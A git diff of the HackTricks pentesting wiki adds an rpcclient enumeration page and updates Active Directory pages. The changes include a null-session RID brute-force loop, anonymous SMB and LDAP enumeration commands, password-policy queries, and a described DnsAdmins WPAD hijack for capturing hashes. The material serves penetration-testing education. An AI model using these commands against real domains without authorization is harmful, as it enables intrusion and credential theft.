[See: ntlm\_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
|
||||||
|
|
||||||
## HackTricks Automatic Commands
|
## HackTricks Automatic Commands
|
||||||
|
|
|
@ -0,0 +1,98 @@
|
||||||
|
# rpcclient enumeration
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
**Pat of this section was extracted from book "**_**Network Security Assesment 3rd Edition**_**"**
|
||||||
|
|
||||||
|
You can use the Samba **`rpcclient`** utility to interact with **RPC endpoints via named pipes**. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon **establishing** a **SMB session** (often requiring credentials).
|
||||||
|
|
||||||
|
#### Server Info
|
||||||
|
|
||||||
|
* **Server Info**: `srvinfo`
|
||||||
|
|
||||||
|
#### Users enumeration
|
||||||
|
|
||||||
|
* **List users**: `querydispinfo` and `enumdomusers`
|
||||||
|
* **Get user details**: `queryuser <0xrid>`
|
||||||
|
* **Get user groups**: `queryusergroups <0xrid>`
|
||||||
|
* **GET SID of a user**: `lookupnames <username>`
|
||||||
|
* **Get users aliases**: `queryuseraliases [builtin|domain] <sid>`
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Brute-Force users RIDs
|
||||||
|
for i in $(seq 500 1100); do
|
||||||
|
rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
|
||||||
|
done
|
||||||
|
|
||||||
|
# You can also use samrdump.py for this purpose
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Groups enumeration
|
||||||
|
|
||||||
|
* **List groups**: `enumdomgroups`
|
||||||
|
* **Get group details**: `querygroup <0xrid>`
|
||||||
|
* **Get group members**: `querygroupmem <0xrid>`
|
||||||
|
|
||||||
|
#### Aliasgroups enumeration
|
||||||
|
|
||||||
|
* **List alias**: `enumalsgroups <builtin|domain>`
|
||||||
|
* **Get members**: `queryaliasmem builtin|domain <0xrid>`
|
||||||
|
|
||||||
|
#### Domains enumeration
|
||||||
|
|
||||||
|
* **List domains**: `enumdomains`
|
||||||
|
* **Get SID**: `lsaquery`
|
||||||
|
* **Domain info**: `querydominfo`
|
||||||
|
|
||||||
|
#### Shares enumeration
|
||||||
|
|
||||||
|
* **Enumerate all available shares**: `netshareenumall`
|
||||||
|
* **Info about a share**: `netsharegetinfo <share>`
|
||||||
|
|
||||||
|
#### More SIDs
|
||||||
|
|
||||||
|
* **Find SIDs by name**: `lookupnames <username>`
|
||||||
|
* **Find more SIDs**: `lsaenumsid`
|
||||||
|
* **RID cycling (check more SIDs)**: `lookupsids <sid>`
|
||||||
|
|
||||||
|
#### **Extra commands**
|
||||||
|
|
||||||
|
| **Command** | **Interface** | **Description** |
|
||||||
|
| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
|
||||||
|
| queryuser | SAMR | Retrieve user information |
|
||||||
|
| querygroup | Retrieve group information | |
|
||||||
|
| querydominfo | Retrieve domain information | |
|
||||||
|
| enumdomusers | Enumerate domain users | |
|
||||||
|
| enumdomgroups | Enumerate domain groups | |
|
||||||
|
| createdomuser | Create a domain user | |
|
||||||
|
| deletedomuser | Delete a domain user | |
|
||||||
|
| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values |
|
||||||
|
| lookupsids | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | |
|
||||||
|
| lsaaddacctrights | Add rights to a user account | |
|
||||||
|
| lsaremoveacctrights | Remove rights from a user account | |
|
||||||
|
| dsroledominfo | LSARPC-DS | Get primary domain information |
|
||||||
|
| dsenumdomtrusts | Enumerate trusted domains within an AD forest | |
|
||||||
|
|
||||||
|
To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](../135-pentesting-msrpc.md).
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
|
</details>
|
|
@ -60,10 +60,20 @@ If you just have access to an AD environment but you don't have any credentials/
|
||||||
* `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
|
* `enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>`
|
||||||
* `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
|
* `smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>`
|
||||||
* `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
|
* `smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //`
|
||||||
* [**A more detailed guide on how to enumerate a SMB server can be found here.**](../../network-services-pentesting/pentesting-smb.md)
|
* A more detailed guide on how to enumerate a SMB server can be found here:
|
||||||
|
|
||||||
|
{% content-ref url="../../network-services-pentesting/pentesting-smb/" %}
|
||||||
|
[pentesting-smb](../../network-services-pentesting/pentesting-smb/)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
* **Enumerate Ldap**
|
* **Enumerate Ldap**
|
||||||
* `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
|
* `nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>`
|
||||||
* [**A more detailed guide on how to enumerate LDAP can be found here.**](../../network-services-pentesting/pentesting-ldap.md)
|
* A more detailed guide on how to enumerate LDAP can be found here (pay **special attention to the anonymous access**):
|
||||||
|
|
||||||
|
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
|
||||||
|
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
* **Poison the network**
|
* **Poison the network**
|
||||||
* Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
* Gather credentials [**impersonating services with Responder**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||||
* Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
|
* Access host by [**abusing the relay attack**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#relay-attack)
|
||||||
|
|
|
@ -59,6 +59,10 @@ klist #List tickets in cache to cehck that mimikatz has loaded the ticket
|
||||||
```
|
```
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
|
||||||
|
|
||||||
<img src="../../.gitbook/assets/image (10).png" alt="" data-size="original">
|
<img src="../../.gitbook/assets/image (10).png" alt="" data-size="original">
|
||||||
|
|
||||||
**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions.
|
**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions.
|
||||||
|
|
|
@ -23,11 +23,24 @@ Notice that you **could lockout some accounts if you try several wrong passwords
|
||||||
|
|
||||||
### Get password policy
|
### Get password policy
|
||||||
|
|
||||||
If you have some user credentials or a shell as a domain user you can get the password policy with:
|
If you have some user credentials or a shell as a domain user you can **get the password policy with**:
|
||||||
|
|
||||||
* `crackmapexec <IP> -u 'user' -p 'password' --pass-pol`
|
```bash
|
||||||
* `enum4linx -u 'username' -p 'password' -P <IP>`
|
# From Linux
|
||||||
* `(Get-DomainPolicy)."SystemAccess" #From powerview`
|
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
|
||||||
|
|
||||||
|
enum4linx -u 'username' -p 'password' -P <IP>
|
||||||
|
|
||||||
|
rpcclient -U "" -N 10.10.10.10;
|
||||||
|
rpcclient $>querydominfo
|
||||||
|
|
||||||
|
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
|
||||||
|
|
||||||
|
# From Windows
|
||||||
|
net accounts
|
||||||
|
|
||||||
|
(Get-DomainPolicy)."SystemAccess" #From powerview
|
||||||
|
```
|
||||||
|
|
||||||
### Exploitation
|
### Exploitation
|
||||||
|
|
||||||
|
|
|
@ -261,8 +261,11 @@ As detailed in this [**post**](http://www.labofapenetrationtester.com/2017/05/ab
|
||||||
|
|
||||||
Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names.
|
Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names.
|
||||||
|
|
||||||
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.\
|
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.
|
||||||
|
|
||||||
|
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
|
||||||
|
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## **AD Recycle Bin**
|
## **AD Recycle Bin**
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue